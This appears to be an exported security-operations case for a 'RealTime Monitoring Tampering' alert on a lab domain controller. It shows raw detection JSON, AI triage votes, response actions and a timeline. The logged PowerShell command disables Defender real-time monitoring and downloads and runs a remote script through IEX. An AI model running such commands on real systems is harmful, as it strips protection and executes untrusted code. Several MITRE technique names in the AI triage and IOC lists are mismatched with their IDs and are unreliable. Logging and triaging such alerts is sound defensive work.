โ
Case #519
general.RealTime Monitoring Tampering
๐ท๏ธ Analyst Verdict Classification
SUSPICIOUS by analyst๐ค AI Analysis
๐ Detections (1)
Realtime Monitoring Process Killed PID 8460
high
Rule: general.RealTime Monitoring Tampering
Hostname: df-labsdc01.dflabs.local ยท Sensor: e4a1c62d-4d1f-44...
Event Type: NEW_PROCESS
Confidence: 82% ยท Verdict: suspicious
Event Data:
BASE_ADDRESS:
140694944940032
COMMAND_LINE:
PowerShell.exe Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1039 -CheckPrereqs ; Invoke-AtomicTest T1039 -GetPrereqs ; Invoke-AtomicTest T1039
FILE_IS_SIGNED:
1
FILE_PATH:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
HASH:
de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c
MEMORY_USAGE:
249815040
PARENT:
{'BASE_ADDRESS': 140698856259584, 'COMMAND_LINE': 'cmd.exe /C C:\\Windows\\TEMP\\pld9B56.tmp.bat T1039 ', 'FILE_IS_SIGNED': 1, 'FILE_PATH': 'C:\\Windows\\System32\\cmd.exe', 'HASH': '3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32ea2', 'MEMORY_USAGE': 4575232, 'PARENT_ATOM': 'd2b1ecad7af81b32ac16ae0d69c2a7fe', 'PARENT_PROCESS_ID': 3496, 'PROCESS_ID': 8460, 'THIS_ATOM': 'c896e11e93fdfcc580e177e469c2a841', 'THREADS': 3, 'TIMESTAMP': 1774364737221, 'USER_NAME': 'NT AUTHORITY\\SYSTEM'}
PARENT_PROCESS_ID:
8460
PROCESS_ID:
9156
THREADS:
30
USER_NAME:
NT AUTHORITY\SYSTEM
IOCs:
{'type': 'command_line', 'value': "Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing)"}
{'type': 'url', 'value': 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1'}
{'type': 'technique', 'value': 'T1039 - Brute Force'}
MITRE:
T1567.001 - Spearphishing Attachment
T1059.001 - Command and Scripting Interpreter: PowerShell
T1562.003 - System Information Discovery
Analyst Declaration:
๐ Raw Detection JSON
{
"author": "ckeller@fusioncybersecurity.us",
"cat": "Realtime Monitoring Process Killed PID 8460",
"detect": {
"event": {
"BASE_ADDRESS": 140694944940032,
"COMMAND_LINE": "PowerShell.exe Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1039 -CheckPrereqs ; Invoke-AtomicTest T1039 -GetPrereqs ; Invoke-AtomicTest T1039 ",
"FILE_IS_SIGNED": 1,
"FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"MEMORY_USAGE": 249815040,
"PARENT": {
"BASE_ADDRESS": 140698856259584,
"COMMAND_LINE": "cmd.exe /C C:\\Windows\\TEMP\\pld9B56.tmp.bat T1039 ",
"FILE_IS_SIGNED": 1,
"FILE_PATH": "C:\\Windows\\System32\\cmd.exe",
"HASH": "3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32ea2",
"MEMORY_USAGE": 4575232,
"PARENT_ATOM": "d2b1ecad7af81b32ac16ae0d69c2a7fe",
"PARENT_PROCESS_ID": 3496,
"PROCESS_ID": 8460,
"THIS_ATOM": "c896e11e93fdfcc580e177e469c2a841",
"THREADS": 3,
"TIMESTAMP": 1774364737221,
"USER_NAME": "NT AUTHORITY\\SYSTEM"
},
"PARENT_PROCESS_ID": 8460,
"PROCESS_ID": 9156,
"THREADS": 30,
"USER_NAME": "NT AUTHORITY\\SYSTEM"
},
"routing": {
"arch": 2,
"did": "",
"event_id": "942080e1-239e-4ded-8513-ffb1c5bcc3a2",
"event_time": 1774364737793,
"event_type": "NEW_PROCESS",
"ext_ip": "67.60.122.240",
"hostname": "df-labsdc01.dflabs.local",
"iid": "47501359-645e-4049-906e-e6195da7afcf",
"int_ip": "192.168.45.129",
"latency": 3799,
"moduleid": 2,
"oid": "ad19afae-3759-4207-b06e-8648b225c455",
"parent": "c896e11e93fdfcc580e177e469c2a841",
"plat": 268435456,
"sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
"tags": [
"domain-controller",
"fusion-soc-alert",
"fusion-soc-case",
"fusion-soc-pulled",
"fusion-soc-triage"
],
"this": "20e47fdec03e5cfc9f50dea369c2a844"
}
},
"detect_id": "7f297351-4352-41fa-bb66-921a69c2a845",
"gen_time": 1774364741594,
"link": "https://app.limacharlie.io/orgs/ad19afae-3759-4207-b06e-8648b225c455/sensors/e4a1c62d-4d1f-4472-bae4-43291246b4d4/timeline?time=1774364737\u0026selected=20e47fdec03e5cfc9f50dea369c2a844",
"namespace": "general",
"routing": {
"arch": 2,
"did": "",
"event_id": "942080e1-239e-4ded-8513-ffb1c5bcc3a2",
"event_time": 1774364737793,
"event_type": "NEW_PROCESS",
"ext_ip": "67.60.122.240",
"hostname": "df-labsdc01.dflabs.local",
"iid": "47501359-645e-4049-906e-e6195da7afcf",
"int_ip": "192.168.45.129",
"latency": 3799,
"moduleid": 2,
"oid": "ad19afae-3759-4207-b06e-8648b225c455",
"parent": "c896e11e93fdfcc580e177e469c2a841",
"plat": 268435456,
"sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
"tags": [
"domain-controller",
"fusion-soc-alert",
"fusion-soc-case",
"fusion-soc-pulled",
"fusion-soc-triage"
],
"this": "20e47fdec03e5cfc9f50dea369c2a844"
},
"source": "ad19afae-3759-4207-b06e-8648b225c455.47501359-645e-4049-906e-e6195da7afcf.e4a1c62d-4d1f-4472-bae4-43291246b4d4.10000000.2",
"source_rule": "general.RealTime Monitoring Tampering",
"ts": 1774364741000
}
๐ Threat Intel JSON
{
"virustotal": {
"malicious": false,
"provider": "virustotal",
"reputation": 73,
"stats": {
"confirmed-timeout": 0,
"failure": 0,
"harmless": 0,
"malicious": 0,
"suspicious": 0,
"timeout": 0,
"type-unsupported": 4,
"undetected": 72
}
}
}
๐ค Triage JSON
{
"confidence": 0.825,
"false_positive_reason": null,
"investigation_questions": [
"What user account was originally logged in before SYSTEM took over?",
"Were there any prior attempts to disable real-time monitoring on this host?",
"Is the Atomic Red Team framework currently active or has it been removed?"
],
"ioc_analysis": "The process is running from its expected location but contains a known malicious payload pattern. The command line includes \u0027Set-MpPreference -DisableRealtimeMonitoring $true\u0027 which disables EDR protection, followed by downloading and executing the Atomic Red Team framework via IEX (Invoke-Expression). This is a classic attack chain for testing or deploying offensive tools.",
"iocs_extracted": [
{
"type": "command_line",
"value": "Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing)"
},
{
"type": "url",
"value": "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1"
},
{
"type": "technique",
"value": "T1039 - Brute Force"
}
],
"mitre_techniques": [
"T1567.001 - Spearphishing Attachment",
"T1059.001 - Command and Scripting Interpreter: PowerShell",
"T1562.003 - System Information Discovery"
],
"recommended_actions": [
"Manual analyst review required \u2014 AI models (split)",
"Immediately isolate the host from the network to prevent lateral movement.",
"Block the download URL at the firewall level.",
"Review all processes spawned by PID 9156 and terminate them.",
"Check for persistence mechanisms installed via Atomic Red Team."
],
"risk_score": 90,
"severity": "high",
"summary": "**Vote: SPLIT (1/2 -\u003e SUSPICIOUS)**\n\n### \u264a gemini-cli Analysis (Primary)\nFailed or timed out.\n\n---\n\n### \ud83e\udd16 qwen3.5:4b Analysis (Secondary)\n**Verdict:** true_positive | **Confidence:** 0.95\nThis event represents a highly malicious PowerShell execution by the SYSTEM account that disables real-time monitoring and downloads/installs the Atomic Red Team framework for testing T1039 (Brute Force). The command explicitly attempts to bypass security controls.\n\n**IOC Analysis:** The process is running from its expected location but contains a known malicious payload pattern. The command line includes \u0027Set-MpPreference -DisableRealtimeMonitoring $true\u0027 which disables EDR protection, followed by downloading and executing the Atomic Red Team framework via IEX (Invoke-Expression). This is a classic attack chain for testing or deploying offensive tools.\n\n---\n\n### \ud83e\udd16 deepseek-r1:8b Analysis (Secondary)\n**Verdict:** suspicious | **Confidence:** 0.7\nA PowerShell process running as SYSTEM with a suspicious command line that disables real-time monitoring and installs Atomic Red Team tools, indicating potential adversary activity despite the legitimate file path and signature.\n\n**IOC Analysis:** The FILE_PATH is a legitimate system binary location (C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe) and the hash is Microsoft-signed, making the file itself benign. However, the command line includes malicious actions such as disabling real-time monitoring and installing tools from GitHub repositories often used in red teaming, raising suspicion.",
"verdict": "suspicious",
"voting": {
"auto_action": "manual_review",
"mode": "split",
"total_models": 2,
"vote_summary": [
"qwen3.5:4b: true_positive (critical, 95% confidence)",
"deepseek-r1:8b: suspicious (high, 70% confidence)"
],
"votes": [
{
"confidence": 0.95,
"model": "qwen3.5:4b",
"verdict": "true_positive"
},
{
"confidence": 0.7,
"model": "deepseek-r1:8b",
"verdict": "suspicious"
}
],
"winning_count": 1,
"winning_verdict": "suspicious"
}
}
โ๏ธ Response Actions
| Action | Target | Status | Result | |
|---|---|---|---|---|
| tag | failed | 401 Client Error: Unauthorized for url: https://api.limacharlie.io/v1/e4a1c62d-4d1f-4472-bae4-43291246b4d4/tags?tags=fusionsoc-investigated | ||
| recommended | executed | General Activity Sweep: 0 events found | ||
| recommended | executed | Lateral Movement Investigation: 50 events found | ||
| recommended | executed | General Activity Sweep: 0 events found | ||
| recommended | executed | Process Tree Investigation: 75 events found | ||
| recommended | executed | Persistence Check: 0 events found |
๐ Add Note
๐ฌ Notes (6)
๐ค FusionSOC AI
2026-03-24T17:12
๐ค FusionSOC AI
2026-03-24T17:12
๐ค FusionSOC AI
2026-03-24T17:12
๐ค FusionSOC AI
2026-03-24T17:12
๐ค FusionSOC AI
2026-03-24T17:12
๐ค FusionSOC AI
2026-03-24T17:12
๐ Timeline
2026-03-24T17:30:27
analyst
Status changed: investigating โ closed
2026-03-24T17:30:23
analyst
Analyst classified as Suspicious (SUSPICIOUS)
2026-03-24T17:12:43
FusionSOC AI
Status changed: investigating โ investigating
2026-03-24T17:12:43
FusionSOC
Action recommended โ executed: Persistence Check: 0 events found
2026-03-24T17:12:43
FusionSOC AI
Note by FusionSOC AI: ## ๐ Persistence Check **Action:** Check for persistence mechanisms installed via Atomic Red Team. **Sensor:** `e4a1c62d...
2026-03-24T17:12:41
FusionSOC
Response action queued: recommended on Check for persistence mechanisms installed via Atomic Red Team.
2026-03-24T17:12:41
FusionSOC AI
Status changed: investigating โ investigating
2026-03-24T17:12:41
FusionSOC
Action recommended โ executed: Process Tree Investigation: 75 events found
2026-03-24T17:12:41
FusionSOC AI
Note by FusionSOC AI: ## ๐ Process Tree Investigation **Action:** Review all processes spawned by PID 9156 and terminate them. **Sensor:** `e4...
2026-03-24T17:12:41
FusionSOC
Response action queued: recommended on Review all processes spawned by PID 9156 and terminate them.
2026-03-24T17:12:41
FusionSOC AI
Status changed: investigating โ investigating
2026-03-24T17:12:41
FusionSOC
Action recommended โ executed: General Activity Sweep: 0 events found
2026-03-24T17:12:41
FusionSOC AI
Note by FusionSOC AI: ## ๐ General Activity Sweep **Action:** Block the download URL at the firewall level. **Sensor:** `e4a1c62d-4d1f-44...` ...
2026-03-24T17:12:40
FusionSOC
Response action queued: recommended on Block the download URL at the firewall level.
2026-03-24T17:12:40
FusionSOC AI
Status changed: investigating โ investigating
2026-03-24T17:12:40
FusionSOC
Action recommended โ executed: Lateral Movement Investigation: 50 events found
2026-03-24T17:12:40
FusionSOC AI
Note by FusionSOC AI: ## ๐ Lateral Movement Investigation **Action:** Immediately isolate the host from the network to prevent lateral movemen...
2026-03-24T17:12:39
FusionSOC
Response action queued: recommended on Immediately isolate the host from the network to prevent lateral movement.
2026-03-24T17:12:39
FusionSOC AI
Status changed: open โ investigating
2026-03-24T17:12:39
FusionSOC
Action recommended โ executed: General Activity Sweep: 0 events found
2026-03-24T17:12:39
FusionSOC AI
Note by FusionSOC AI: ## ๐ General Activity Sweep **Action:** Manual analyst review required โ AI models (split) **Sensor:** `e4a1c62d-4d1f-44...
2026-03-24T17:12:39
FusionSOC
Response action queued: recommended on Manual analyst review required โ AI models (split)
2026-03-24T17:12:39
FusionSOC
Action tag โ failed: 401 Client Error: Unauthorized for url: https://api.limacharlie.io/v1/e4a1c62d-4d1f-4472-bae4-43291246b4d4/tags?tags=fusionsoc-investigated
2026-03-24T17:12:38
FusionSOC
Response action queued: tag on e4a1c62d-4d1f-4472-bae4-43291246b4d4:fusionsoc-investigated
2026-03-24T17:12:38
FusionSOC AI
Detection 7f297351-4352-41fa-bb66-921a69c2a845 triaged as suspicious (high severity, confidence: 82%)
2026-03-24T17:12:38
FusionSOC AI
Case created from detection: general.RealTime Monitoring Tampering